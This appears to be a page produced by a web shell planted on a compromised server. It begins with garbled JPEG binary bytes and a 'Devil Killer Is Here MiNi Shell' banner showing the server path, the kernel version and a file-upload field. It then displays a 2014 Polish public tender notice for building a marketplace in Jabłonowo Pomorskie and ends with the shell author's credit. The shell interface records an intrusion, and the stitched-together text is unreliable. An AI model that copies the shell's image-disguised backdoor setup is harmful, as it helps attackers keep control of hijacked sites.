JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140122/24920-N-2014.html

<p class="kh_header"><b>Jabłonowo Pomorskie: Budowę targowiska stałego w  Jabłonowie Pomorskim</b><br>
<b>Numer ogłoszenia: 24920 - 2014; data zamieszczenia: 22.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Jabłonowo Pomorskie , ul. Główna 28, 87-330 Jabłonowo Pomorskie, woj. kujawsko-pomorskie, tel. 56 69 76 800, faks 56 79 001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www:bip.jablonowopomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowę targowiska stałego w  Jabłonowie Pomorskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z 3 części obejmujących wyodrębniony zakres robót  opisanych poniżej .
Opis  części przedmiotu zamówienia:
Część I.
1.	Budowa ogrodzenia o wysokości 2,0 m z siatki ocynkowanej na słupkach z rur stalowych o średnicy 76 mm w rozstawie co 2,1 m o  długości 398,3 m 
2.	Wykonanie bram wjazdowych o wysokości 2,0 m z siatki ocynkowanej w ramkach z kątowników stalowych o szerokości 4,5 m - 3 kpl.
3.	Wykonanie furtki o wysokości 2,0 m z siatki ocynkowanej w ramce z kątowników stalowych o szerokości 1,2 m - 1 kpl.
4.	Wykonanie schodów betonowych o szerokości 1,2 m łączących chodnik przy ul. Mostowej z furtką wejściową na teren targowiska z balustradami stalowymi zabezpieczającymi. 
5.	Wykonanie 4 stóp fundamentowych wraz z obsadzeniem kotew pod słupy ozdobnej drewnianej bramy wjazdowej przewidzianej do wykonanej i montażu w części II Zamówienia.

Część II.
1.	Wykonanie i montaż wiat drewnianych nad stoiskami zadaszonymi z wykonaniem pokrycia 
i odwodnienia dachu  - 12 kpl.
2.	Wykonanie i montaż stołów z drewna impregnowanego dla stoisk zadaszonych (96 szt.) - 356,16 m2 
3.	Wykonanie i montaż stołów z drewna impregnowanego - wolnostojących handlowych (8 szt.) -78,4 m2 
4.	Wykonanie i montaż drewnianej bramy ozdobnej o szerokości 6,0 m i wysokości 4,2m przy wjeździe na teren targowiska na przygotowanych w Części I stopach fundamentowych - 1 kpl.
Część III.
1.	Wykonanie karczowania, plantowania i niwelacji terenu pod targowisko - 0,955ha 
2.	Wykonanie sieci kanalizacji deszczowej z rur PVC o średnicy zewnętrznej 200 mm - 136,9 m , rur PVC o średnicy zewnętrznej 315 mm - 22,0 m wraz ze studniami rewizyjnymi z kręgów betonowych 
o średnicy 1200 mm - 6 szt. , studzienkami ściekowymi betonowymi o średnicy 500 mm  z wpustem ulicznym - 8 szt. oraz separatorem ropopochodnych o średnicy nominalnej 200 cm - 1 kpl.
3.	Wykonanie sieci kanalizacji sanitarnej z rur PVC o średnicy zewnętrznej 200 mm - 107,0 m, rur PVC o średnicy zewnętrznej 160 mm - 5,5 m wraz ze studniami rewizyjnymi z kręgów betonowych 
o średnicy 1200 mm - 3 szt. , studzienkami ściekowymi betonowymi o średnicy 500 mm  z wpustem ulicznym - 4 szt.
4.	Wykonanie sieci wodociągowej z rur ciśnieniowych PCV o średnicy zewnętrznej 90 mm -18,0 m , rur ciśnieniowych PCV o średnicy zewnętrznej 110 mm - 88,0 m, wykonanie przecisku rurami o średnicy 216/10 mm pod ulicą Przemysłową - 11 m, wykonanie hydrantu podziemnego dn 80 - 1 szt., wykonanie hydrantu nadziemnego dn 80 - 1 szt., wykonanie studni wodomierzowej o średnicy 1500 mm wraz z uzbrojeniem - 1 kpl. 
5.	Wykonanie stóp fundamentowych wraz z kotwami pod słupy konstrukcji drewnianej wiat nad stoiskami zadaszonymi - 120 szt.
6.	Wykonanie linii oświetlenia zewnętrznego kablowej YAKY 4x25 mm2 w rurze osłonowej  PCV o średnicy 75 mm - 180 m z montażem i ustawieniem 12 szt. słupów oświetleniowych z wysięgnikami i oprawami.
7.	Wykonanie zasilania i instalacji elektrycznych wiat handlowych - 12 kpl.
8.	Wykonanie podejścia elektrycznego kablowego w rurze osłonowej do zasilania boksów handlowych od złącza licznikowego do miejsca planowanego wybudowania boksu z pozostawieniem zapasu kabla pod ziemią z wciąganiem do rur osłonowych w ciągach wielokrotnych o łącznej długości kabla YKY 3x6 mm2 - 758 m   
9.	Wykonanie kompletnego budynku inkasenta i sanitariatów wraz z instalacjami sanitarnymi i elektrycznymi.
10.	Wykonanie parkingu dla samochodów ciężarowych o nawierzchni z płyt betonowych ażurowych grubości  12,5 cm - 1 171,1 m2.
11.	 Wykonanie parkingu i jezdni drogi wewnętrznej o nawierzchni z kostki betonowej gr. 8 cm na podbudowie betonowej gr. 15 cm - 1 024,23 m2.
12.	Wykonanie w strefie handlowej chodników i ciągów pieszych o nawierzchni z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej gr. 5 cm - 4 032.304  m2.
13.	Wykonanie chodnika poza placem targowiska o nawierzchni z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej gr. 5 cm -  440.00  m2.
14.	Wykonanie trawników dywanowych z rozścieleniem ziemi urodzajnej gr. 10 cm - 0,47 ha .
15.	Inwentaryzacja geodezyjna powykonawcza..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.40-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium, kwota wadium wynosi: 
1.1.	Części I  -   1 000 zł,  słownie : jeden tysiąc złotych
1.2.	Część II -    9 000 zł,   słownie : dziewięć tysięcy złotych
1.3.	Część III - 20 000 zł,  słownie : dwadzieścia tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www:bip.jablonowopomorskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy 
ul. Główna 28 pok. nr 18
87-330 Jabłonowo omorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy 
ul. Główna 28 pok. nr 10
87-330 Jabłonowo Pomorskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW w ramach działania 321 Podstawowe usługi dla gospdarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ogrodzenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Budowa ogrodzenia o wysokości 2,0 m z siatki ocynkowanej na słupkach z rur stalowych o średnicy 76 mm w rozstawie co 2,1 m o  długości 398,3 m 
2.	Wykonanie bram wjazdowych o wysokości 2,0 m z siatki ocynkowanej w ramkach z kątowników stalowych o szerokości 4,5 m - 3 kpl.
3.	Wykonanie furtki o wysokości 2,0 m z siatki ocynkowanej w ramce z kątowników stalowych o szerokości 1,2 m - 1 kpl.
4.	Wykonanie schodów betonowych o szerokości 1,2 m łączących chodnik przy ul. Mostowej z furtką wejściową na teren targowiska z balustradami stalowymi zabezpieczającymi. 
5.	Wykonanie 4 stóp fundamentowych wraz z obsadzeniem kotew pod słupy ozdobnej drewnianej bramy wjazdowej przewidzianej do wykonanej i montażu w części II Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Elementy drewniane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wykonanie i montaż wiat drewnianych nad stoiskami zadaszonymi z wykonaniem pokrycia 
i odwodnienia dachu  - 12 kpl.
2.	Wykonanie i montaż stołów z drewna impregnowanego dla stoisk zadaszonych (96 szt.) - 356,16 m2 
3.	Wykonanie i montaż stołów z drewna impregnowanego - wolnostojących handlowych (8 szt.) -78,4 m2 
4.	Wykonanie i montaż drewnianej bramy ozdobnej o szerokości 6,0 m i wysokości 4,2m przy wjeździe na teren targowiska na przygotowanych w Części I stopach fundamentowych - 1 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty budowlane, drogowe i instalacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wykonanie karczowania, plantowania i niwelacji terenu pod targowisko - 0,955ha 
2.	Wykonanie sieci kanalizacji deszczowej z rur PVC o średnicy zewnętrznej 200 mm - 136,9 m , rur PVC o średnicy zewnętrznej 315 mm - 22,0 m wraz ze studniami rewizyjnymi z kręgów betonowych 
o średnicy 1200 mm - 6 szt. , studzienkami ściekowymi betonowymi o średnicy 500 mm  z wpustem ulicznym - 8 szt. oraz separatorem ropopochodnych o średnicy nominalnej 200 cm - 1 kpl.
3.	Wykonanie sieci kanalizacji sanitarnej z rur PVC o średnicy zewnętrznej 200 mm - 107,0 m, rur PVC o średnicy zewnętrznej 160 mm - 5,5 m wraz ze studniami rewizyjnymi z kręgów betonowych 
o średnicy 1200 mm - 3 szt. , studzienkami ściekowymi betonowymi o średnicy 500 mm  z wpustem ulicznym - 4 szt.
4.	Wykonanie sieci wodociągowej z rur ciśnieniowych PCV o średnicy zewnętrznej 90 mm -18,0 m , rur ciśnieniowych PCV o średnicy zewnętrznej 110 mm - 88,0 m, wykonanie przecisku rurami o średnicy 216/10 mm pod ulicą Przemysłową - 11 m, wykonanie hydrantu podziemnego dn 80 - 1 szt., wykonanie hydrantu nadziemnego dn 80 - 1 szt., wykonanie studni wodomierzowej o średnicy 1500 mm wraz z uzbrojeniem - 1 kpl. 
5.	Wykonanie stóp fundamentowych wraz z kotwami pod słupy konstrukcji drewnianej wiat nad stoiskami zadaszonymi - 120 szt.
6.	Wykonanie linii oświetlenia zewnętrznego kablowej YAKY 4x25 mm2 w rurze osłonowej  PCV o średnicy 75 mm - 180 m z montażem i ustawieniem 12 szt. słupów oświetleniowych z wysięgnikami i oprawami.
7.	Wykonanie zasilania i instalacji elektrycznych wiat handlowych - 12 kpl.
8.	Wykonanie podejścia elektrycznego kablowego w rurze osłonowej do zasilania boksów handlowych od złącza licznikowego do miejsca planowanego wybudowania boksu z pozostawieniem zapasu kabla pod ziemią z wciąganiem do rur osłonowych w ciągach wielokrotnych o łącznej długości kabla YKY 3x6 mm2 - 758 m   
9.	Wykonanie kompletnego budynku inkasenta i sanitariatów wraz z instalacjami sanitarnymi i elektrycznymi.
10.	Wykonanie parkingu dla samochodów ciężarowych o nawierzchni z płyt betonowych ażurowych grubości  12,5 cm - 1 171,1 m2.
11.	 Wykonanie parkingu i jezdni drogi wewnętrznej o nawierzchni z kostki betonowej gr. 8 cm na podbudowie betonowej gr. 15 cm - 1 024,23 m2.
12.	Wykonanie w strefie handlowej chodników i ciągów pieszych o nawierzchni z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej gr. 5 cm - 4 032.304  m2.
13.	Wykonanie chodnika poza placem targowiska o nawierzchni z kostki betonowej gr. 6 cm na podsypce cementowo-piaskowej gr. 5 cm -  440.00  m2.
14.	Wykonanie trawników dywanowych z rozścieleniem ziemi urodzajnej gr. 10 cm - 0,47 ha .
15.	Inwentaryzacja geodezyjna powykonawcza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com